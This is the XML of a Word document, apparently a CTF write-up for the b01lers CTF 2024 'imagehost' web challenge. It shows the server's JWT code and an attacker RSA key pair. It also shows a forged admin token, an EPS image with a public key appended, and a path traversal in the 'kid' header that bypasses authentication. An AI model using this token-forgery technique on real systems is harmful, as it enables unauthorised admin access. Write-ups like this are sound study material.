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DF7" w:rsidRDefault="00B22DF7" w:rsidP="00B22DF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701"/>
        <w:gridCol w:w="7643"/>
      </w:tblGrid>
      <w:tr w:rsid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B22DF7" w:rsidRDefault="00B22DF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22DF7" w:rsidRDefault="00B22DF7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B22DF7" w:rsidTr="00B22DF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Pr="00B22DF7" w:rsidRDefault="00B22DF7" w:rsidP="00B22DF7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B22DF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 w:rsidP="00B22DF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b01lers CTF 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22DF7" w:rsidTr="00B22DF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Pr="00B22DF7" w:rsidRDefault="00B22DF7" w:rsidP="00B22DF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B22DF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 w:rsidP="00B22DF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 w:rsidRPr="00B22DF7">
              <w:t>imagehost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22DF7" w:rsidTr="00B22DF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 w:rsidP="00B22DF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Категории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 w:rsidP="00B22DF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Web, image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22DF7" w:rsidTr="00B22DF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 w:rsidP="00B22DF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Ссылка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https://ctftime.org/event/2250/tasks/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsid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22DF7" w:rsidRDefault="00B22DF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B22DF7" w:rsidRP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2DF7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>totally not reinventing the wheel...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsid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22DF7" w:rsidRDefault="00B22DF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22DF7" w:rsidRDefault="00B22DF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44581E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t>Attachments</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0044581E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t>:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0044581E" w:rsidRPr="0044581E" w:rsidRDefault="0044581E" w:rsidP="0044581E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:ind w:left="375"/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t>imagehost.zip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In this zip file there is a python implementation of an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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imagehost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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web server. This implementation contains code for session handling via JSON Web Tokens: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from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pathlib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Path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jwt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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def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gramStart"/>
            <w:r w:rsidRPr="0044581E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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encode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payload,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public_key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Path,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private_key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 Path):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key =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private_</w:t>
            </w:r>
            <w:proofErr w:type="gram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key.read</w:t>
            </w:r>
            <w:proofErr w:type="gram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_bytes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jwt.encode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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(payload=payload, key=key, algorithm=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"RS256"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 headers={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"kid"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str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public_key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)})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def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decode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(token):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headers =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jwt.get_unverified_header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(token)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public_key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Path(headers[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"kid"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])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public_key.absolute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().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is_relative_to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proofErr w:type="gram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Path.cwd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)):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key =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public_</w:t>
            </w:r>
            <w:proofErr w:type="gram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key.read</w:t>
            </w:r>
            <w:proofErr w:type="gram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_bytes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jwt.decode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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jwt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=token, key=key, algorithms=[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"RS256"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])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proofErr w:type="spellStart"/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else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:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B22DF7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 xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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return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 xml:space="preserve"> {}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsid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B22DF7" w:rsidRPr="0044581E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Creating a token via login produces something like this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>eyJhbGciOiJSUzI1NiIsImtpZCI6InB1YmxpY19rZXkucGVtIiwidHlwIjoiSldUIn0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.eyJ1c2VyX2lkIjozLCJhZG1pbiI6bnVsbH0.O46AMfAsFuXqRNkf00FrDYGQN1lqt7M3gAExp-RXv7C1Po4TUNnnnpb_DR8UrrBYIfn1kvXBxQzXr2EqJduh67fs3MRGaYXmSyLkQ26QBDfuF-L6A89e4g5Jf4qE3jirp210i1q2374vqVW9VeCoP7hfkLlPuSK5VDAm8BfDaSRF4odWH1klpT_fo03NsVpahg1H0sgak0lDvAssVXcbhZ-8KRo64QOcL8tKjZzbCsoll-rfxgyKdGRyLgVxBRw6Kay1ei_dG6j7mNGnQupNr8fy9IdCexEOABjAHoI640cujOl7z0g2SUB4tzG7txVbRm15jcysBvD_NVonvoE3VGUgbSg_V5lkj5ofLNWCh9jN7hlj6xEXql3QzsVWJQHgYm5dpEuoxizXdozqvi6AOKn6SR5BG1jHYs1XCnSW5XnqbO6OBfTdSTYas1lRJ-NCzsvJs3wYEbjHJp9CDMA9NCJJVDTZ7EkMyhrN7CJH8LHGU8ZrTkqKFKl3_bQeQWmgfI9URIatlLafnk8aw7YkOU4gkXJqZvtwpfaMYF8GgIujeVM7I8c11jPF-k58OAM7lUOOpBsK_fW9JQQ9_VZqF6pJltKpwR3I-saRcyL3p6M-3CpwWI2FS4bqfkcQDj9wuqxEF45uP-wn3TyqAteV1wX_Ei7N5uVNQ8cHSFIigPI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This can be decoded via https://jwt.io/ The header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alg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":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"RS256"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"kid":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public_key.pem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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typ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":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"JWT"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The payload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user_id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":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3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"admin": </w:t>
            </w:r>
            <w:r w:rsidRPr="0044581E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="78A96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null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We suspect that we can upload our own public key pretending it is an image file. We will sign our payload containing the admin </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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user_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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, with a known private key. Then use our own public key to check the signature.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For signing our own payload Public Key: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-----BEGIN PUBLIC KEY-----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MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr79D8wfWGTEBR5z/hSI6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W799WS+kCZoYw0UqooJQ5nzld1mGwgNW+yNyxHdDaBfxjFtetW6anDaissUpQqRl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jVRIvt3Mo85t4pgoRJEiUFQ6YtsLaUXax/ZMaYmhilf7IvlkEX9fn6bPlpBOqGFe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4FhrEhyt38rOiBtAxWm0pcRyWHZ+LuCbmJu41+AGTzfNiGFWJSQ7yN0w5sASpdkN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U+mdYez2CbyqrQdPRJtilLdFzggFYiVD8EfabsOTTKUkIi+Zgg8MRRvMm+xYIxex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4Vawf8devya18NRoN+aIahCdA753hpAcuDldzUEtPytuS+1946+KUdpPFWiKUgaM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YQIDAQAB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-----END PUBLIC KEY-----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Private Key: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-----BEGIN PRIVATE KEY-----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MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCvv0PzB9YZMQFH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nP+FIjpbv31ZL6QJmhjDRSqiglDmfOV3WYb</w:t>
            </w:r>
            <w:r w:rsidRPr="0044581E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CA1b7I3LEd0NoF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/GMW161bpqcNqKy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xSlCpGWNVEi+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3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cyjzm3imChEkSJQVDpi2wtpRdrH9kxpiaGKV/si+WQRf1+fps+W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kE6oYV7gWGsSHK3fys6IG0DFabSlxHJYdn4u4JuYm7jX4AZPN82IYVYlJDvI3TDm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lastRenderedPageBreak/>
              <w:t>wBKl2Q1T6Z1h7PYJvKqtB09Em2KUt0XO</w:t>
            </w:r>
            <w:r w:rsidRPr="0044581E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CAViJUPwR9puw5NMpSQiL5mCDwxFG8yb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7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FgjF7HhVrB/x16/JrXw1Gg35ohqEJ0DvneGkBy4OV3NQS0/K25L7X3jr4pR2k8V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aIpSBoxhAgMBAAECggEAAvgAFsgTSzkFQpN9yz7gFZ5NKLNV4fnj+NH3ebfp9A/I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bEkDTk4SQ0MmuFgDp+uuH1LojVfrRY/kdRDArP0UEFRr92ntn9eACpGrjfd16P2Y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QCTfOym0e7fe0/JQy9KHRfCoqqVAPTUbGPnyczSUXsWtlthsTT1Kuni74g3SYPGy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pQuO9j2ICP8N9AeNh2yGHf3r2i5uKwOCyErniwzzBHJPBcMHfYD3d8IOTgUTmFLg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esBAzTEwLmAy8vA0zSwGfFaHMa0OhjZrc+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4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f7BUU1ajD9m7Uskbs6PMSjqLZYzPG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ctCkIeyaLIc+dPU+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3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Cumf5EkzcT0qYrX5bsadGIAUQKBgQD3IDle2DcqUCDRzfQ0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HJGoxjBoUxX2ai5qZ/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2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D1IGAdtTnFyw73IZvHzN9mg7g5TZNXSFlHCK4ZS2hXXpy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lePML7t/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2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ZUovEwwDx4KbenwZLAzLYTNpI++D0b2H53+ySpEtsA6yfq7TP+PWa2x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UnLCZqnwZcwrQd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/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0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equ58OLJ0QKBgQC2Dt8il/I0rTzebzfuApibPOKlY5JyTTnU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BmJIh8eZuL5obwRdf53OljgMU5XyTy7swzot4Pz7MJlCTMe/+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0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HvjuaABcDgmJd/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N4gcuR+chOiYw7Bc2</w:t>
            </w:r>
            <w:r w:rsidRPr="0044581E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NSyGodq2WR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/f/BiMcXBAbqEALbXAQy9mkCH4xePTdEA3EPY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Xml3SDCtkQKBgGv67JaAqzoV4QFLmJTcltjEIIq1IzeUlctwvNlJlXxocAa5nV5a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sXMEkx8inbWu8ddEBj+D17fyncmQatx+mhayFJ98lyxBepjVQi8Ub8/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WbxctoIWq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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jhRh4IPStNqLU6jKoZwOfTwyHMiqSrbca8B902tzT47nLdBJeZe5pZ7BAoGAHIBv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hmbrUDvez6PxyZ02bvc1NFdGUgatCviE4n3/TZ2SkZ7vvAOCnRj/ZU6gpvKmkgJu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VUhn0ptlIvAKRY/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8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XpislVZRP9gjv5LeCEEjJcnY8DGSprZ7dfaZRK0MArnw1C6e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mvy+SnQiK77KU9SWTa/LvG+eTNgu9uyw7i+rD0ECgYBKphKWj9ru+Q0Bp5IHCBn5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PXhCuCzaHdWhka8tl44LjBSLLect2PA9oFiKEUA8HSnYylAnZ1LCca7uTrK9jJlL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metr5MaO3e9xDzlq4CcEo3+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7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KyVhDTylzM7pfx3QjcSrwtZYiNTRU+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pEPfIqXv5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I8STSTbbJ</w:t>
            </w:r>
            <w:r w:rsidRPr="0044581E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XCTwQ9LY2TXvw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==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-----END PRIVATE KEY-----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The modified header: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alg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":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"RS256"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"kid":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"/a/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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our_own_public_key.pem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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typ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":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"JWT"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The modified session payload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user_id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":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"admin": </w:t>
            </w:r>
            <w:r w:rsidRPr="0044581E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="78A96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null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</w:t>
            </w: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We can create the needed token with the token.py functions given by the task source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&gt;&gt;&gt;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from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pathlib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import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Path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1F7199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&gt;&gt;&gt; </w:t>
            </w:r>
            <w:proofErr w:type="gram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encode(</w:t>
            </w:r>
            <w:proofErr w:type="gram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proofErr w:type="spellStart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user_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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"admin"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True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}, Path(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'../../</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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public_key.pem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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), Path(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'../../</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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private_key.pem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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))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eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ii4uLy4uL3B1YmxpY19rZXkucGVtIn0.eyJ1c2VyX2lkIjoxLCJhZG1pbiI6dHJ1ZX0.oGlGsmuASM6q4oxmhMVXVscY0xZyBnex8W5VuKPBWlporlGgrn9LdoHqi4aLel6P1VxRvCDptRX9_tmNQzcUSTl3fLkPkrIUAFb-Wf0ZHpIsQ6j2_kmTEZMoenr72B6G9MUg4Z_qh1Y8JM5DtTENWpC1pM_KfKGJorfT_6wgseaBxvm7PDDQyuPAVD4gAY0PUR2_VJH3M4h94e0c2Gc2sIh-ZjbRyDnhVN9qaM0z54gNbHklEIPlrHt2PxoxC3yowbR9aFV0kdy9fk54EtFIpOKVGj84Bs3Q3rXnILvLr1KEryiw4wyqSJ2cSkeiuAikXCpd-_SGsw_DU1Xdng6FsA'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B22DF7" w:rsidRPr="0044581E" w:rsidRDefault="00B22DF7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22DF7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2DF7" w:rsidRDefault="00B22DF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B22DF7" w:rsidRPr="0044581E" w:rsidTr="00B22DF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We created + uploaded postscript 1x1p image with public key attached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gram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%!PS</w:t>
            </w:r>
            <w:proofErr w:type="gram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-Adobe-3.0 EPSF-3.0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%%Creator: GIMP PostScript file plug-in V 1,17 by Peter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Kirchgessner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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%%Title: 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evil.eps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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CreationDate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 Sun Apr 14 02:06:11 2024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DocumentData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 Clean7Bit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LanguageLevel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 2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%%Pages: 1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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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BoundingBox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 14 14 15 15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%%EndComments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%%BeginProlog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%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Use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own dictionary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to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avoid conflicts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10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dict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begin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%%EndProlog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%%Page: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%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Translate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for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offset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14.173228346456694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14.173228346456694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translate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%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Translate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to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begin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of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first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scanline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0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0.24000000000000002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translate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0.24000000000000002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-0.24000000000000002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scale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 Image geometry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8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 Transformation matrix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[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0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0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0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0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]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% Strings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to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hold RGB-samples per scanline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/rstr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string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def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/gstr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string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def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/bstr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string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def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{currentfile /ASCII85Decode filter /RunLengthDecode filter rstr readstring pop}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{currentfile /ASCII85Decode filter /RunLengthDecode filter gstr readstring pop}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{currentfile /ASCII85Decode filter /RunLengthDecode filter bstr readstring pop}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78A96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true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3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%%BeginData:           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32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ASCII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Bytes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colorimage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!&lt;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7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Q~&gt;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!&lt;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7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Q~&gt;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!&lt;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7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Q~&gt;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%%EndData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showpage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%%Trailer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end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%%EOF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-----BEGIN PUBLIC KEY-----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MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr79D8wfWGTEBR5z/hSI6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W799WS+kCZoYw0UqooJQ5nzld1mGwgNW+yNyxHdDaBfxjFtetW6anDaissUpQqRl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jVRIvt3Mo85t4pgoRJEiUFQ6YtsLaUXax/ZMaYmhilf7IvlkEX9fn6bPlpBOqGFe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4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FhrEhyt38rOiBtAxWm0pcRyWHZ+LuCbmJu41+AGTzfNiGFWJSQ7yN0w5sASpdkN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U+mdYez2CbyqrQdPRJtilLdFzggFYiVD8EfabsOTTKUkIi+Zgg8MRRvMm+xYIxex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4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Vawf8devya18NRoN+aIahCdA753hpAcuDldzUEtPytuS+</w:t>
            </w:r>
            <w:r w:rsidRPr="0044581E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1946</w:t>
            </w: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+KUdpPFWiKUgaM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YQIDAQAB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44581E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-----END PUBLIC KEY-----</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0044581E" w:rsidRPr="0044581E" w:rsidRDefault="0044581E" w:rsidP="0044581E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44581E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We can exploit a path traversal vulnerability using "/app/../uploads" (must start with /app) We then change the jwt header path to the given upload path and can login using the generated admin jwt token.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B22DF7" w:rsidRPr="0044581E" w:rsidRDefault="0044581E" w:rsidP="0044581E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44581E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Flag: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0044581E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bctf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0044581E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="DD1144"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E1E1E8" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7F7F9"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>{should've_used_imgur}</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B22DF7" w:rsidRDefault="00B22DF7" w:rsidP="00B22DF7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B22DF7" w:rsidRDefault="00B22DF7" w:rsidP="00B22DF7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B22DF7" w:rsidRDefault="00B22DF7" w:rsidP="00B22DF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80B25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F3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DF7"/>
    <w:rsid w:val="0044581E"/>
    <w:rsid w:val="006C0B77"/>
    <w:rsid w:val="008242FF"/>
    <w:rsid w:val="00870751"/>
    <w:rsid w:val="00922C48"/>
    <w:rsid w:val="00B22DF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73864"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9254D0AF-2643-46DE-9D26-BFC35FA8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B22DF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B22DF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D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D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DF7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30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00B22DF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B22DF7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22D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2DF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B22DF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a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta-keyword">
    <w:name w:val="hljs-meta-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-section">
    <w:name w:val="hljs-section"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B22DF7"/>
  </w:style>
  <w:style w:type="table" w:styleId="a4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B22DF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B22D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ljs-selector-tag">
    <w:name w:val="hljs-selector-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0044581E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-class">
    <w:name w:val="hljs-selector-class"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0044581E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attr">
    <w:name w:val="hljs-attr"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00445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9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2024-06-27T15:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-27T15:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>